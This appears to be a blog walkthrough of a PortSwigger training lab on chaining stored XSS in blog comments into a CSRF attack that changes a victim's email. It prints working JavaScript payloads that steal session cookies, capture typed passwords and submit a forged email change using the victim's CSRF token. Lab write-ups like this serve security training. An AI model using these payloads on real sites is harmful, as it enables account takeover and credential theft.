.png)
9 months ago
56 BOOK THIS SPACE FOR AD
ARTICLE ADA Portswigger Lab
Lab Description:
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peterHint — You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.
NOTE:
I will be using Burp Suite Community Edition to help solve this lab. If you have it installed go ahead and have that running when you access the lab.
Access the lab. For this lab, we need to log in to our fictional account with the juvenile credentials provided in the lab description: wiener:peter. On the home page click on the ‘My account’ link in the upper right corner.
On the login page, use the credentials provided.
Click ‘Log in’.
Once logged in, you will be brought to a page where it is prompting you to change your email. Go ahead and change this to anything you like. We will need to catch the request in Burp to find out what parameters we are going to need when crafting the payload.
Click ‘Update email’.
You will be brought back to the same page, but notice the line that begins with ‘Your email is:’ has been updated to your new email.
This payload is going to be a continuation of the payload of the previous two labs: Exploiting Cross-Site Scripting to Steal Cookies and Exploiting Cross-Site Scripting to Capture Passwords.
In the ‘Steal Cookies’ lab we crafted the original payload to post the victim’s session cookie:
<!-- Original Payload --><script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value
var data = new FormData();
data.append('csrf', token);
data.append('postId', 8); // replace number with correct postId
data.append('comment', document.cookie);
data.append('name', 'victim');
data.append('email', 'blah@email.com');
data.append('website', 'http://blah.com');
fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>
In the ‘Capture Password’ lab we altered it, just a bit, to have the victim unknowingly post their username and password:
<!-- Altered to post username:password --><input type="text" name="username">
<input type="password" name="password" onchange="dothis()">
<script>
function dothis() {
var username = document.getElementsByName('username')[0].value
var password = document.getElementsByName('password')[0].value
var token = document.getElementsByName('csrf')[0].value
var data = new FormData();
data.append('csrf', token);
data.append('postId', 8); // Change '8' to correct postId
data.append('comment', `${username}:${password}`);
data.append('name', 'victim');
data.append('email', 'blah@email.com');
data.append('website', 'http://blah.com');
fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
};
</script>
Now, for this lab, we need to alter it again in order to change a victim’s email address without them knowing. The common thread among the three is that we use Burp Suite Community Edition to find out what parameters we need to append to our POST request.
Head over to Burp ‘Target’ tab and find the ‘change-email’ request on the left hand side, in the target tree. Left-click to highlight it, and you will be able to see the request on the right.
Here you can see the required parameters needed to make a successful email change. All we are going to need is the email that we are going to change it to, and the victim’s CSRF token.
So, if we take our original payload and stripped all the unneeded ‘data.append’ lines, we should have what we need.
<!-- Unneeded lines are commented out --><script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value
var data = new FormData();
data.append('csrf', token);
// data.append('postId', 8);
// data.append('comment', document.cookie);
// data.append('name', 'victim');
data.append('email', 'blah@email.com');
// data.append('website', 'http://blah.com');
fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>
Here would be where we add the email we are changing the victim’s email to. We also need to change where we are sending this POST request to.
<!-- Unneeded lines removed and fetch() destination changed --><script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value
var data = new FormData();
data.append('csrf', token);
data.append('email', 'M4rdukwasH3re@EvilEmail.com');
fetch('/my-account/change-email', { // Change the fetch destination
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>
So, in short, this script will wait until the DOM is completely loaded, then it will append the victim’s CSRF token to the request by searching the document for the first element with the name ‘csrf’ and inserting it’s value along with the new email address.
Back on our blog page navigate your way to your favorite blog post. Scroll down to find the comment form. The final payload should be pasted into the comment box.
<!-- Final payload --><script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value
var data = new FormData();
data.append('csrf', token);
data.append('email', 'M4rdukwasH3re@EvilEmail.com');
fetch('/my-account/change-email', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>
You also need to fill in the other required fields: Name, Email, and Website. All can be made up but website needs to start with ‘http://’ or ‘https://’
Click ‘Post Comment’.
Congratulations, you solved another one! Keep up the amazing work!
See you next time! With expert-level labs!
Bengali (Bangladesh) · 
English (United States) ·